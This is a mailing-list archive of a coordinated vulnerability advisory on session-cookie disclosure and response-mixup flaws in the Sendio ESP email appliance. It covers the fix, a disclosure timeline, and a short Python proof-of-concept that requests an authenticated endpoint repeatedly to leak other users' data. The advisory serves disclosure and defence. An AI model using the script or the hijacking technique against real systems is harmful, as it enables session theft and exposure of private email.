[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] [CORE-2015-0010] - Sendio ESP Information Disclosure Vulnerability
From: CORE Advisories Team <advisories () coresecurity ! com>
Date: 2015-05-22 16:11:59
Message-ID: 555F554F.4000306 () coresecurity ! com
[Download RAW message or body]
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], \
Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus \
solutions for enterprises. Two information disclosure issues were found affecting some versions of this \
software, and can lead to leakage of sensitive information such as user's session identifiers and/or \
user's email messages.
4. Vulnerable Packages
Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. \
Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their \
Sendio product and only use HTTPS.
6. Credits
This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services \
Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's \
Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. Disclosure of session cookie in Web interface URLs
The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". The \
vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this \
authentication cookie, as the "jsessionid" cookie value is included in URLs when obtaining the content of \
emails. The URLs used by the application follow this format:
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
This causes the application to disclose the session identifier value, allowing attackers to perform \
session hijacking. An attacker might perform this kind of attack by sending an email message containing \
links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's \
session cookies through the "Referrer" HTTP header. Accessing this authentication cookie might allow an \
attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of \
the victim.
7.2. Response mixup in Web interface
The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web \
interface. Under certain conditions, this could lead to the server disclosing sensitive information that \
was intended for a different user. This information includes, for instance, other users' session \
identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, \
requests should be authenticated.
The following Python script can be used to trigger this vulnerability under certain circumstances:
import requests
domain = "target.domain.com" # The target domain
port = 8888 # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid
num = 100000 # No of request to make
msgid = 9999999 # A valid message id to baseline the requests
url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid)
def make_request(id):
params = {"id": str(id)}
headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
return requests.get(url, params=params, headers=headers)
print "[*] Reaching the target to define baseline"
r = make_request(msgid)
baseline_length = r.headers["content-length"]
print "[*] Defined baseline: %d bytes" % baseline_length
for id in range(0, num):
r = make_request(msgid)
rlength = int(r.headers["content-length"])
if r.status_code == 200 and rlength != baseline_length:
print "\t", r.status_code, rlength, r.text
else:
print "\t", r.status_code, rlength
8. Report Timeline
2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple \
vulnerabilities were found in one of their products, and requested their PGP keys in order to start an \
encrypted communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP \
gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the \
"CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, \
2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" \
vulnerability.
2015-03-30: Core Security informed that understood that Sendio may not be able to use PGP keys, but Core \
doesn't consider the use of TLS as a replacement for PGP. Core Security requested to receive confirmation \
from Sendio in case they wanted to keep the communications unencrypted with PGP in order to send them a \
draft version of the advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core \
once they have a specific date for publishing the fix. Sendio requested a PoC for the \
"CS_SENDIO_INFO_LEAK vulnerability".
2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide \
an update on their test on April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and \
that were still analyzing it in order to create a fix.
2015-04-07: Core Security requested an estimated date for the release of a fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all \
use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" \
they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on \
May 15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their \
security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 \
in order to avoid publishing them on a Friday.
2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to \
"automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is \
published. Sendio also requested the ability to add some workarounds into Core's \
advisory.
2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that \
it is Core's policy to publish their advisory the same day the fix is released in order to inform the \
affected users of its availability. Core also stated that they were willing to add any workarounds Sendio \
proposed.
2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession \
vulnerability, therefore they may have to postpone the release date from May 15 to May \
22.
2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to \
have enough time to schedule their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. \
Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a \
draft copy of it.
2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would \
send them a draft copy of it once they produced the final version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay \
the release of the advisory until Friday 22.
2015-05-22: Advisory CORE-2015-0010 published.
9. References
[1] http://www.sendio.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and \
requirements for information security technologies. We conduct our research in several important areas of \
computer security including system vulnerabilities, cyber attack planning and simulation, source code \
auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, \
novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, \
technical papers, project information and shared software tools for public use at: \
http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and \
measurement solutions that continuously identify and demonstrate real-world exposures to their most \
critical assets. Our customers can gain real visibility into their security standing, real validation of \
their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat \
expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security \
Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are \
licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: \
http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for \
download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic